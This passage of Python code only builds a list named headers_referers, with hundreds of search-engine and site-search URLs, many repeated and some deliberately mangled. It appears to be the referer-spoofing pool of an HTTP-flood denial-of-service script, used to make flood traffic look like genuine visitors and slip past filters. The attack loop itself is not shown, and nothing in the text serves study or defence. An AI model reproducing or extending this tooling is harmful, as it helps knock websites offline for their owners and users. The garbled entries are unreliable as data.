headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.bing.com/search?q=')
headers_referers.append('http://search.yahoo.com/search?p=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..')
headers_referers.append('http://vk.com/profile.php?redirect=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=query?=query=..')
headers_referers.append('https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://go.mail.ru/search?mail.ru=1&q=')
headers_referers.append('http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..')
headers_referers.append('http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..')
headers_referers.append('http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..')
headers_referers.append('http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..')
headers_referers.append('http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..')
headers_referers.append('http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..')
headers_referers.append('http://www.google.ru/url?sa=t&rct=?j&q=&e..')
headers_referers.append('http://help.baidu.com/searchResult?keywords=')
headers_referers.append('http://www.bing.com/search?q=')
headers_referers.append('https://www.yandex.com/yandsearch?text=')
headers_referers.append('https://duckduckgo.com/?q=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.aol.com/aol/search?q=')
headers_referers.append('https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=')
headers_referers.append('https://drive.google.com/viewerng/viewer?url=')
headers_referers.append('http://validator.w3.org/feed/check.cgi?url=')
headers_referers.append('http://host-tracker.com/check_page/?furl=')
headers_referers.append('http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=')
headers_referers.append('http://jigsaw.w3.org/css-validator/validator?uri=')
headers_referers.append('https://add.my.yahoo.com/rss?url=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('https://steamcommunity.com/market/search?q=')
headers_referers.append('http://filehippo.com/search?q=')
headers_referers.append('http://www.topsiteminecraft.com/site/pinterest.com/search?q=')
headers_referers.append('http://eu.battle.net/wow/en/search?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://careers.gatesfoundation.org/search?q=')
headers_referers.append('http://techtv.mit.edu/search?q=')
headers_referers.append('http://www.ustream.tv/search?q=')
headers_referers.append('http://www.ted.com/search?q=')
headers_referers.append('http://funnymama.com/search?q=')
headers_referers.append('http://itch.io/search?q=')
headers_referers.append('http://jobs.rbs.com/jobs/search?q=')
headers_referers.append('http://taginfo.openstreetmap.org/search?q=')
headers_referers.append('http://www.baoxaydung.com.vn/news/vn/search&q=')
headers_referers.append('https://play.google.com/store/search?q=')
headers_referers.append('http://www.tceq.texas.gov/@@tceq-search?q=')
headers_referers.append('http://www.reddit.com/search?q=')
headers_referers.append('http://www.bestbuytheater.com/events/search?q=')
headers_referers.append('https://careers.carolinashealthcare.org/search?q=')
headers_referers.append('http://jobs.leidos.com/search?q=')
headers_referers.append('http://jobs.bloomberg.com/search?q=')
headers_referers.append('https://www.pinterest.com/search/?q=')
headers_referers.append('http://millercenter.org/search?q=')
headers_referers.append('https://www.npmjs.com/search?q=')
headers_referers.append('http://www.evidence.nhs.uk/search?q=')
headers_referers.append('http://www.shodanhq.com/search?q=')
headers_referers.append('http://ytmnd.com/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.google.com/?q=')
